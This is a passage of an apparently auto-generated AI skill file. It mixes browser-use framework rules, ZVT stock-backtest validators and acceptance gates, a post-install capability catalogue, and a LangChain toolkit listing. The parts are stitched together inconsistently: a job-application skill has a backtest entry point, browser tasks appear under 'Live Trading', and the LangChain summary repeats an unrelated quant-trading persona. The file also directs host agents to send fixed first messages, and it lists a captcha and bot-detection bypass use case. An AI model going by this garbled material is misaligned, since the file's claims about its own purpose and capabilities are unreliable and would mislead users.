      calls. For DOM querying, use the existing DomService / serializer pipeline. For interactions, use Input.dispatchKeyEvent
      / Input.dispatchMouseEvent. For screenshots, use Page.captureScreenshot. For tracing, use Tracing domain. The cdp-use
      library is the typed wrapper — see https://github.com/browser-use/cdp-use. If you genuinely need Playwright, write a
      separate wrapper layer outside browser-use rather than mixing protocols inside it.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When designing prompt templates or system_prompt extensions that describe how the LLM should emit the done action
    action: 'In any prompt extension or skill instruction, instruct the LLM: ''When you decide the task is complete, emit
      done as the SOLE action in that step — do not combine with click/input/navigate/etc.'' If you build a custom output
      validator on top of AgentOutput, enforce this rule pre-submit. Note: pre_done_verification (5-step checklist in system_prompt.md:119-153)
      is intended to fire BEFORE done is emitted, not in the same step as done.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When implementing a custom @tools.action that may navigate, switch tabs, close tabs, or otherwise change the page/tab
      context the LLM was looking at
    action: 'If your action triggers any of: URL navigation, tab switch, tab close, history navigation (back/forward), iframe
      context change — set terminates_sequence=True on the @tools.action decorator. The framework will then break the multi-action
      loop after your action runs, forcing the next step to re-collect state. Reference: navigate (line 486), search (442),
      go_back (562), switch_tab (970), close_tab (995) all set this flag. evaluate (JS execution) is also implicitly treated
      as page-changing per global_contracts.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When designing a multi-action step that includes the `evaluate` JS action, or when extending the framework with
      custom JS-injection tooling
    action: 'Treat evaluate as having terminates_sequence-equivalent semantics in your prompt design: do not chain click/input
      after evaluate in the same step. If you need to read JS-computed state without mutating, prefer (a) a dedicated read-only
      @tools.action that calls a constrained Runtime.evaluate with a returnByValue: true on a deliberately side-effect-free
      expression, AND (b) explicitly re-collect state after — but understand the framework cannot prove your JS is side-effect-free,
      so multi_act treats it as page-changing regardless.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When tuning Agent settings for long or brittle tasks where the default 5-failure budget feels too tight
    action: Raise max_steps to allow more total work units (default 100 in many examples). Only raise max_failures if you
      have explicit evidence that 5 consecutive failures are recoverable in your domain (rare). Never raise max_failures as
      a workaround for prompt bugs or stale-index loops — the cost is N×llm_timeout per extra failure with no real progress.
      If your task takes 50 steps and you expect occasional retries, max_steps=80 + max_failures=5 is correct, NOT max_failures=20.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When the agent on your workload either (a) trips loop detection on legitimate work or (b) fails to detect real stuck
      states
    action: 'Profile the workload first: count typical action-repetition rate on a successful run. For long form-filling flows
      (50-step questionnaires), raising loop_detection_window to 30-40 is reasonable. For short scrape tasks (~10 steps),
      lowering to 10-15 catches loops faster. Override via Agent(loop_detection_window=N). Never raise beyond ~50 — at that
      point, you have effectively disabled detection and your real failure mode will be runaway LLM cost.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When configuring BrowserProfile for any workflow that may navigate to PDF URLs and need to read PDF content
    action: Verify both flags remain True in your BrowserProfile (the default) for any PDF-reading workflow. Also confirm
      downloads_path is set to a writable location. To explicitly opt-out of downloads (e.g. read-only browser session), accept
      that PDF reading degrades — the LLM will see the PDF viewer chrome only. The prompts.py:294-300 PDF-viewer hint will
      guide the LLM to attempt read_file on the auto-downloaded copy; without the download having happened, this hint misleads.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When writing install scripts, Dockerfiles, CI YAMLs, or skill bundles that pin Python versions for browser-use deployment
    action: Pin python_requires>=3.11 in any wrapper pyproject.toml. In Dockerfile, use FROM python:3.11-slim or higher. In
      CI matrix, exclude 3.10 / 3.9 / 3.8 from test runs. In install docs, prominently state '3.11 or higher required'. If
      you must support 3.10 hosts, browser-use is not the right dependency — pick a different framework.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When deploying browser-use with use_cloud=True OR with the default ChatBrowserUse LLM (i.e. the LLM passed to Agent
      has not been explicitly switched)
    action: 'Set BROWSER_USE_API_KEY in your env / .env / secrets manager BEFORE Agent construction. Verify with: assert os.getenv(''BROWSER_USE_API_KEY''),
      ''BROWSER_USE_API_KEY required for default ChatBrowserUse / cloud path''. To avoid the requirement entirely, switch
      to a different LLM provider: pass llm=ChatOpenAI(...) or llm=ChatAnthropic(...) AND ensure their respective env vars
      (OPENAI_API_KEY / ANTHROPIC_API_KEY / etc.) are set. ChatBrowserUse remains the recommended default per AGENTS.md but
      is not the only option.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When adding a new LLM provider to browser_use/llm/, or when AgentOutput schema (in agent/views.py) gains a new field
    action: 'Add a new provider via the copy-paste recipe but ALSO: (a) write a smoke test that round-trips an AgentOutput
      with all current fields through the new provider''s ainvoke; (b) set up a CI matrix that runs the smoke test against
      every provider in browser_use/llm/; (c) when extending AgentOutput, grep browser_use/llm/ for ChatXxx implementations
      and audit each for the new field. Without these, new providers get partial implementations that fail only when actually
      used.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When implementing form-fill workflows that handle passwords, API keys, PII, or financial credentials
    action: 'Pass sensitive values via Agent(sensitive_data={''password'': ''realvalue'', ''api_key'': ''realvalue''}). In
      task description, reference by name: task = ''Log in to example.com using <secret>password</secret>''. The framework
      substitutes the value at action-execution time without exposing it to the LLM. CRITICAL: also enforce browseruse-C-002
      (set allowed_domains) — sensitive_data WITHOUT allowed_domains is fail-OPEN. The two constraints together provide the
      full safety guarantee.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When deciding whether to enable flash_mode for a given workload, or when designing a custom agent loop that diverges
      from the single-call pattern
    action: (a) Default to flash_mode=False unless your workload is latency-critical AND tolerates lower self-evaluation quality
      (e.g. simple navigation, no destructive actions). (b) For destructive / high-stakes / brittle flows, keep full thinking
      + evaluation enabled — the cost of one bad action exceeds the LLM cost of evaluation. (c) Do NOT split the loop into
      separate observe / think / act calls thinking it improves reasoning — that breaks the architectural contract and roughly
      doubles per-step LLM cost.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When constructing the task string passed to Agent(task='...'), especially for production workflows where determinism
      matters
    action: 'For deterministic workflows: phrase the task as explicit steps — ''Step 1: navigate to X. Step 2: enter Y in
      field Z. Step 3: click Submit. Step 4: verify success message.'' This pushes the LLM into the specific-step branch.
      For exploration: use ''Find the cheapest flight from X to Y under $500'' — open verbs trigger the open-ended branch.
      Avoid in-between phrasings like ''help me with X'' that the LLM may classify either way.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When the agent reports 'no element found' on a page where you can visually see the element, or when the agent clicks
      something visually behind a modal/overlay
    action: (a) Toggle BrowserProfile(paint_order_filtering=False) on a test run to see if the missing/wrong element appears
      differently — confirms the algorithm is the cause. (b) On confirmed false-negative (LLM should see element X), file
      a minimal-repro page in browser_use/dom/serializer/paint_order tests; workaround is to disable filtering on that page
      only. (c) On confirmed false-positive (LLM clicks behind modal), the bug is in the page's stacking context and the agent
      prompt should be extended with 'verify modal is dismissed before clicking underlying elements'. Do NOT disable globally
      in production — the filtering prevents the more common modal-click bug.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When tuning max_failures based on observed step failures, or when debugging why an agent ran longer than max_failures
      should allow
    action: 'Understand: max_failures applies to single-action step failures only. If your task uses multi-action steps and
      you observe many ''failures'' but the agent doesn''t terminate, that is by design — the framework expects loop_detector
      to catch the stuck state instead. To force per-action failure counting, set max_actions_per_step=1 (which has the side
      effect described in browseruse-C-004 — useful for SPA targets). Do NOT raise max_failures expecting it to apply per-action
      — it does not.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When wrapping browser-use in a higher-level retry / error-handler / recovery layer
    action: 'In your wrapper''s exception handling: distinguish InterruptedError (re-raise to caller, do not retry), connection-level
      (websocket-related, browser-process-died errors — wait + retry, not a logic failure), and other (treat as logic failure,
      possibly consume retry budget). Do NOT lump all exceptions into one retry counter — connection blips look like ''agent
      failure'' but the agent is fine, the network died. Reference: service.py:1246-1302 for the exact branches.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When choosing whether to set cross_origin_iframes explicitly in BrowserProfile, or when documenting browser-use
      behavior
    action: 'Do NOT write recipes / docs / wrappers that say ''cross_origin_iframes defaults to False — must explicitly enable
      for SSO/payment''. The default IS True. Only set it to False as a deliberate performance optimization for tasks that
      demonstrably never touch cross-origin iframes (rare). When in doubt, leave the default. Reading dom/service.py:50 ''s
      `cross_origin_iframes: bool = False` is misleading — that default is dead, only triggered for direct DomService construction
      without profile, which the framework never does.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When designing prompt extensions for destructive workflows or when wrapping browser-use for safety-critical tasks
    action: 'In any prompt extension targeting destructive flows, add an explicit instruction: ''On each step, FIRST inspect
      _closed_popup_messages from the previous state. If any message contains keywords (delete, discard, remove, leave, unsaved),
      evaluate whether the action you just took was intended. If unintended, attempt rollback (undo / re-create) before proceeding.
      Always log the popup text in your memory field for audit.'' This is a prompt-side mitigation for browseruse-C-001; the
      framework provides the data, not the safety logic.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When evaluating browser-use for use cases with regulatory audit requirements (HIPAA, GDPR, SOC2, financial compliance)
      or post-incident forensic analysis needs
    action: (a) Enable har_recording_watchdog explicitly via BrowserProfile if you need network-trace auditability (HAR file
      written to disk). (b) Set save_conversation_path on Agent if you need LLM I/O auditability. (c) For full action trail,
      register a custom watchdog LISTENS_TO every action-completion event and write to your durable log (DB / event stream
      / file). The framework provides the seams (event bus, watchdog pattern) but does not provide the persistent audit log
      itself.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When choosing which LLM to pass to Agent in a production deployment, especially when vendor neutrality / cost /
      data residency / on-prem requirements apply
    action: 'Explicitly choose an LLM provider matching your constraints: on-prem → ChatOllama / ChatLMStudio / ChatOpenAICompatible
      (point at vLLM); cost-sensitive → ChatGroq (fast, cheap, narrower model menu); vendor-aligned → ChatOpenAI / ChatAnthropic
      / ChatGoogle. Document the chosen provider + rationale in your wrapper. Be aware: ChatBrowserUse may genuinely be the
      fastest/cheapest/most-accurate for browser tasks (per AGENTS.md claim), but that is not verifiable from OSS source —
      it is a vendor claim. Validate against your own metrics if it matters.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When extending the system prompt or designing safety-critical workflows that depend on the framework rejecting stale-index
      actions
    action: 'Treat the rule as an LLM-side instruction, not a guardrail. If you override system_prompt, KEEP the rule verbatim
      (browseruse-C-005). For safety-critical flows, add explicit detection: register a custom @tools.action wrapper that
      checks the index against the latest browser_state.dom_state.selector_map BEFORE acting; raise on mismatch instead of
      returning extracted_content. This is the only way to convert the soft rule into a hard guardrail.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When designing an agent task that uses many `extract` actions per step or has predictable structured-output extraction
      needs
    action: 'Pass page_extraction_llm explicitly: agent = Agent(task=..., llm=ChatAnthropic(''claude-sonnet''), page_extraction_llm=ChatOpenAI(''gpt-4o-mini''),
      browser=...). Estimate the cost split: each extract call = 1 LLM round-trip; if you have 5+ extracts per task, the savings
      are significant. Validate the cheaper model produces correct structured output for your schema (Pydantic validation
      will surface schema-mismatch failures); if quality drops, walk back to the main LLM.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When implementing custom tools by passing a Tools instance to Agent(tools=...)
    action: 'Use Tools(exclude_actions=[''action_name'', ...]) to remove specific defaults while keeping the rest. To add
      custom actions, use the @tools.action decorator on the same Tools instance. Reference: service.py:316-321 shows the
      framework constructs Tools(exclude_actions=[''screenshot'']) when use_vision is not ''auto''. Do NOT pass actions=[...]
      expecting your custom set to merge with defaults — it does not.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When choosing max_steps for a task where the natural workload step count is close to the budget you'd pick
    action: Set max_steps to (estimated task steps) + 10 minimum buffer. For workloads averaging 30 steps, use max_steps=50;
      for 100-step workloads, use max_steps=150. Never set max_steps exactly equal to estimated step count — pre_done_verification,
      final_response, and occasional retries need headroom. If your workload genuinely needs more than 200 steps, consider
      decomposing into multiple agent runs with handoff state.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-133 / Apply to a Job (Rochester Health) — auto-fill form + upload resume
    version: v6.1
    intent_keywords:
    - apply
    - job application
    - resume upload
    - form fill
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (5 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 3
        ucs:
        - uc_id: UC-001
          name: Apply to a Job (Rochester Health) — auto-fill form + upload resume
          short_description: Use a structured resume + LLM-driven form filling to complete a job application end-to-end, including
            PDF upload and submit click
          sample_triggers:
          - apply
          - job application
          - resume upload
        - uc_id: UC-002
          name: Migros online groceries shopping + checkout (TWINT)
          short_description: Search products, add to cart, choose delivery slot, and pay via Swiss TWINT
          sample_triggers:
          - shopping
          - groceries
          - cart
        - uc_id: UC-007
          name: PCPartPicker — build an ITX PC with budget constraint
          short_description: Configure a compatible PC build within budget on PCPartPicker
          sample_triggers:
          - pc build
          - itx
          - budget
      - group_id: monitoring
        name: Monitoring
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-003
          name: Greek MFA visa appointment monitoring
          short_description: Periodically poll for appointment availability and report when slots open
          sample_triggers:
          - visa
          - appointment
          - monitor
      - group_id: data_pipeline
        name: Data Pipeline
        description: ''
        emoji: 📊
        uc_count: 5
        ucs:
        - uc_id: UC-004
          name: Extract PDF content (House.gov documents)
          short_description: 'Auto-download a PDF on visit and read specific page content via the file_system read_file action
            — the in-browser PDF viewer cannot be DOM-interacted '
          sample_triggers:
          - pdf
          - extract
          - read pages
        - uc_id: UC-008
          name: Phone cross-site comparison (structured output)
          short_description: Crawl multiple e-commerce sites and emit a structured Pydantic phone comparison table
          sample_triggers:
          - compare
          - phone
          - cross-site
        - uc_id: UC-009
          name: Find influencer profiles across platforms
          short_description: Search multiple social platforms for influencer profiles matching criteria
          sample_triggers:
          - influencer
          - social
          - profile search
        - uc_id: UC-012
          name: File download (Excel / PDF)
          short_description: Trigger and wait-for download events, surface downloaded paths
          sample_triggers:
          - download
          - file
          - save
        - uc_id: UC-017
          name: Excel generation (Alphabet earnings)
          short_description: Scrape earnings data and write to Excel via file_system write_file
          sample_triggers:
          - excel
          - csv
          - earnings
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 8
        ucs:
        - uc_id: UC-005
          name: Captcha demo (cloud-only solving)
          short_description: Demonstration of captcha handling
          sample_triggers:
          - captcha
          - solve
          - demo
        - uc_id: UC-010
          name: Multi-tab parallel exploration
          short_description: Open multiple tabs and compare/cross-reference content
          sample_triggers:
          - multi-tab
          - parallel exploration
        - uc_id: UC-011
          name: Multi-agent parallel runs
          short_description: Run several Agent instances in parallel for fan-out tasks
          sample_triggers:
          - parallel agents
          - fan-out
          - multi-agent
        - uc_id: UC-013
          name: Sensitive-data form fill (LLM never sees plaintext)
          short_description: Pass sensitive_data={...} to Agent so it can fill forms without surfacing plaintext to the LLM
          sample_triggers:
          - sensitive data
          - password
          - mask credentials
        - uc_id: UC-014
          name: Domain access restrictions (allowed/prohibited)
          short_description: Limit agent's reachable URL set via allowed_domains / prohibited_domains
          sample_triggers:
          - allowed_domains
          - prohibited
          - scope lockdown
        - uc_id: UC-015
          name: Custom system prompt (extend or override)
          short_description: Append (extend_system_message) or replace (override_system_message) the default Agent prompt
          sample_triggers:
          - system prompt
          - customize
          - override
        - uc_id: UC-016
          name: Structured output (Pydantic schema)
          short_description: Force `done` action to return a Pydantic-validated structure
          sample_triggers:
          - structured output
          - pydantic
          - schema
        - uc_id: UC-020
          name: CLI daemon (terminal control of local browser)
          short_description: Run `browser-use open / state / click / ...` from the terminal to drive a persistent daemon-managed
            browser at ~50ms per command latency
          sample_triggers:
          - cli
          - daemon
          - terminal
      - group_id: live_trading
        name: Live Trading
        description: ''
        emoji: 📦
        uc_count: 3
        ucs:
        - uc_id: UC-006
          name: 1Password secure login (vault-backed credentials)
          short_description: Pull credentials from 1Password vault into a custom @tools.action and fill them into forms; LLM
            never sees the plaintext
          sample_triggers:
          - login
          - 1password
          - credential vault
        - uc_id: UC-018
          name: Sandbox deployment via @sandbox decorator
          short_description: Wrap local agent code with @sandbox() to run in cloud production
          sample_triggers:
          - sandbox
          - production
          - cloud deploy
        - uc_id: UC-019
          name: Cloud browser + persistent profile + proxy
          short_description: Use cloud-hosted browser to reuse logged-in profiles, bypass captcha / bot detection
          sample_triggers:
          - cloud
          - profile
          - proxy
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try apply to a job (rochester health) — auto-fill form + upload resume
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try migros online groceries shopping + checkout (twint)
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try greek mfa visa appointment monitoring
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 20 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Greek MFA visa appointment monitoring
    - Migros online groceries shopping + checkout (TWINT)
    - Apply to a Job (Rochester Health) — auto-fill form + upload resume
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Langchain V1 Toolkit

Skill

LangChain v1：把 LLM、prompt、tool、retriever、parser 暴露为 Runnable，用 `|` 操作符（LCEL）组合成统一 invoke / stream / batch 接口的链。 LangChain v1: exposes LLMs, prompts, tools, r...

---
name: langchain-v1-toolkit
description: |-
  LangChain v1：把 LLM、prompt、tool、retriever、parser 暴露为 Runnable，用 `|` 操作符（LCEL）组合成统一 invoke / stream / batch 接口的链。
  LangChain v1: exposes LLMs, prompts, tools, retrievers, and parsers as Runnables composed via the `|` operator (LCEL) into chains with uniform invoke / stream / batch semantics. create_agent returns a LangGraph CompiledStateGraph.
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-132"
  blueprint_source: "langchain-ai/langchain"
  blueprint_commit: "87ba30f09773b8e9ec549841c57906f343b35ed8"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/langchain-v1-toolkit"
  openclaw:
    skillKey: langchain-v1-toolkit
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

LangChain 是构建 LLM 应用的事实标准 Python 框架（github.com/langchain-ai/langchain）。v1 包（v1.2.15）有意保持精简：核心是 `agents.create_agent`（返回 LangGraph CompiledStateGraph）、`chat_models.init_chat_model` 工厂、message types 重导出和 tools/embeddings shim。

历史 `Chain` / `LLMChain` / `Memory` / `AgentExecutor` 接口已迁到 `langchain-clas...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/langchain-v1-toolkit

## 知识规模

- **51 条约束** (1 fatal + 50 non-fatal)
- 上游源码: `langchain-ai/langchain` @ commit `87ba30f0`
- 蓝图 ID: `finance-bp-132`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合用 LangChain 构建 LLM 应用的工程师：tool-calling agent、结构化输出、RAG pipeline、流式输出、模型 fallback、PII 脱敏等。v1 后 agent 走 LangGraph 路径，旧 AgentExecutor 仍可用但建议迁移。访问 doramagic.ai/r/langchain 查看完整用例。

### 需要准备什么环境？依赖什么？
Python（具体版本见 langchain_v1/pyproject.toml），`pip install langchain` 自动带 LangGraph 作为硬运行时依赖。每个 provider 需单独安装 partner 包（如 langchain-openai、langchain-anthropic）。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 51 条约束。典型踩坑：(1) BaseMemory 与所有 Conversation*Memory 已 @deprecated，BaseMemory 已从 langchain_core 删除；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/langchain-v1-toolkit

FILE:human_summary.md
# finance-bp-132-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
